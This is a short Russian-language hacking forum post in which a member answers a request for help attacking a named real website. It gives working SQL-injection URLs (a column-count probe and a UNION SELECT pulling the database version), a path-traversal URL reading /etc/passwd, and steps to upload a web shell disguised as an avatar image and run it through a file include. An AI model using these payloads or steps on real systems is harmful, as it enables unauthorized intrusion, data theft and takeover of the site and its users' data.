29.08.2008, 16:39
|
|
Участник форума
Регистрация: 06.10.2006
Сообщений: 226
С нами:
10313606
Репутация:
1327
|
|
Сообщение от geforse
Помогите плизз:
Код:
http://www.freedancer.ru/?module=messages&page=comments&messageid=2095+order+by+1,2,3,4,5,6/*
С SQL-Inj мало работал( Немного покопался я....
PHP код:
http://www.freedancer.ru/?module=messages&page=comments&messageid=-2095'+union+select+1,2,3,4,5,6,7,8,9,AES_DECRYPT(AES_ENCRYPT(version(),0x78),0x78),11,12+from+cms_site_comments/*
если пойти дальше, можно найти читалку файлов...
PHP код:
http://www.freedancer.ru/?module=../../../../../../../../etc/passwd%00&cmd=list&dt=2
как видно magic_quotes_gpc = Off, что очень радует!
Далее регаемся, заливаем картинку с телом шелла в автару, путь будет примерно такой:
/home/www/stussy/freedancer/cache/avatars/image.jpg
С помощью читалки ищем дырку в каком нить скрипте, где будет возможен инклуд и инклудим сам шелл....
вот и все =)
|
|
|